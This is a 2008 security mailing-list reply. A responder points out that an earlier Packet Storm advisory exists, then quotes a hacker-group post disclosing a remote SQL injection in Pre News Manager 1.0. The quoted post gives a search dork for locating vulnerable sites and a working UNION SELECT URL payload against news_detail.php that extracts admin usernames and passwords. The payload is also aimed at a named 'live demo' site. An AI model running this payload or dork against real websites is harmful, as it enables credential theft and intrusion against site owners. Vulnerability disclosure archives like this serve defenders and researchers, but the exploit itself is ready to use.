Re: News Manager Remote SQL Injection Vulnerability
- From: packet@xxxxxxxxxxxxxxxxxxxxxxx
- Date: Thu, 9 Oct 2008 18:20:30 -0400
Discovered over a year ago.
http://packetstormsecurity.org/0705-exploits/prenews-sql.txt 0bae5b1d6f9d99c6749403341807f0d8 Pre News Manager version 1.0 suffers from a remote SQL injection vulnerability. Homepage: <a href="http://www.cyber-security.org/"; target="ext">http://www.cyber-security.org/.</a>
On Thu, Oct 09, 2008 at 12:21:25PM +0300, Ghost hacker wrote:
####################################################################################################
# News Manager Remote SQL Injection Vulnerability #
# © Ghost Hacker , Real Hack Back :) #
####################################################################################################
#[~] Author : Ghost Hacker #
#[~] Home page : www.Real-h.com [Real Hack Back] #
#[~] Contact Me : Ghost-r00t@xxxxxxxxxxx #
#[~] Bug : SQL Injection #
#[~] From : Kingdom Saudi Arabia #
#[~] Name Script : News Manager #
#[~] Download : http://www.preprojects.com/news.asp #
####################################################################################################
#[~] Dork : #
# ©2006 PRE NEWS MANAGER | All Rights Reserved Or inurl:news_detail.php?nid= #
#[~] Exploit : #
# http://xxxx/news_detail.php?nid=-139+UNION+SELECT+1,2,concat(login,0x3a,password),3,5,6,7+from+admin--
#[~] live demo : #
# http://www.preproject.com/news manager/news_detail.php?nid=-139+UNION+SELECT+1,2,concat(login,0x3a,password),3,5,6,7+from+admin--
####################################################################################################
#[~]Greets : #
# Mr.SQL , Mr.SaFa7 , Mr-3sheq , aBo3tB , Night Mare , Root Hacker , Dmar al3noOoz , L&J TeaM #
# Mr.MN7oS , Mr.Hope , EgYpTiaN x HaCkEr , PrO SpY , v4-team.com #
# All Members Real Hack , All My Friends :) #
####################################################################################################
# Viva Real Hack - Real-h.com .. #
####################################################################################################
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
- References:
- News Manager Remote SQL Injection Vulnerability
- From: Ghost hacker
- News Manager Remote SQL Injection Vulnerability
- Prev by Date: CA ARCserve Backup Multiple Vulnerabilities
- Next by Date: [SECURITY] CVE-2008-3271 - Apache Tomcat information disclosure
- Previous by thread: News Manager Remote SQL Injection Vulnerability
- Next by thread: [ GLSA 200810-02 ] Portage: Untrusted search path local root vulnerability
- Index(es):
